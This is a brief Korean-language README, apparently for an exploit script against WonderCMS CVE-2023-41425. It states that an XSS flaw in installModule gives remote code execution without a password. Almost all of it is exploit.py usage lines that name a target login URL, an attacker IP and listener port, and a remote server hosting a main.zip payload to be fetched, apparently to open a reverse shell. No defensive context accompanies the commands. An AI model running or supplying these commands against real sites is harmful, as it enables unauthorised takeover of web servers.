
WonderCMS RCE CVE-2023-41425
WonderCMS 버전 v3.2.0 ~ v3.4.2는 XSS 취약점이 있어 악의적인 공격자가 installModule CVE-2023-41425에 컴포넌트를 업로드하여 RCE를 달성할 수 있습니다 (비밀번호를 알 필요 없음).
main.zip 파일을 다운로드할 원격 호스트 지정
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
또는 main.zip 파일을 지정하지 않음. 기본적으로 main.zip에서 다운로드합니다.
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
